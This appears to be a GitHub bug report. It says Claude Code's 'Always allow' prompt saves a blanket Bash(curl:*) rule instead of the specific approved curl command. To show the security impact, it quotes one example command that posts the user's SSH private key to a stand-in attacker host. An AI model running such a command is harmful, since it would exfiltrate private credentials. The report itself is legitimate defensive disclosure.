Permission system saves wildcard Bash(curl:*) instead of specific command pattern

Resolved 💬 3 comments Opened Feb 7, 2026 by wwallace04-projects Closed Feb 11, 2026

Bug Description

When approving a specific curl command via the permission prompt (e.g., "Always allow"), the system saves Bash(curl:*) to settings.local.json instead of the specific command pattern the user intended to approve.

Steps to Reproduce

  1. Remove Bash(curl:*) from both settings.json and settings.local.json
  2. Trigger a curl command (e.g., curl -s -X POST http://<internal-ip>:3101/call ...)
  3. When prompted, select "Always allow" to pre-approve future calls matching this pattern
  4. Check settings.local.json

Expected Behavior

The specific command pattern should be saved, e.g.:

"Bash(curl -s -X POST http://<internal-ip>:3101:*)"

Or at minimum, the pattern the user selected in the approval dialog should be what gets persisted.

Actual Behavior

The wildcard Bash(curl:*) is appended to the allow list, which auto-approves ALL curl commands regardless of destination. This defeats the purpose of scoped permissions.

In my case, three specific curl commands to a known IP were correctly saved, but a subsequent approval also added the blanket wildcard:

"Bash(curl -s -X POST http://<internal-ip>:3101/call ...)",   // specific - correct
"Bash(curl -s -X POST http://<internal-ip>:3101/call ...)",   // specific - correct
"Bash(curl -s -X POST http://<internal-ip>:3101/call ...)",   // specific - correct
"Bash(curl:*)"                                                  // wildcard - BUG

Security Impact

This is a security concern because Bash(curl:*) allows data exfiltration to arbitrary external servers (e.g., curl -X POST https://evil.com -d "$(cat ~/.ssh/id_rsa)"). Users who intentionally restrict curl to specific IPs/hosts for prompt injection defense are unknowingly having their restrictions bypassed.

Environment

  • Claude Code CLI (terminal, not IDE)
  • Platform: Linux (WSL2)
  • The bug reproduced 3 times in a single session — each time I removed the wildcard and re-approved a specific curl command, the wildcard came back

Workaround

Manually edit settings.local.json after each curl approval to remove the Bash(curl:*) entry. This is tedious and error-prone.

View original on GitHub ↗

This issue has 3 comments on GitHub. Read the full discussion on GitHub ↗